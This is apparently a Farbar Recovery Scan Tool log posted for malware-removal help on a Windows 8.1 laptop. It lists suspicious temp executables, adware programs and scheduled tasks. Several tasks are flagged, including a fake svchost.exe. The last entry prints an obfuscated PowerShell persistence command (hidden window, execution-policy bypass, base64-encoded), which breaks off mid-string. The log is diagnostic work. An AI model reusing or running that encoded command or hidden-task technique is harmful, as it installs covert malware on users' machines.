2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Files to move or delete:
====================
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


Some files in TEMP:
====================
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
Apparently there's more:



Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 18:14:36)
Running from E:\
Windows 8.1 (X64) (2015-01-23 06:44:37)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
 
Last one :)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&amp;cc=CA
Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFM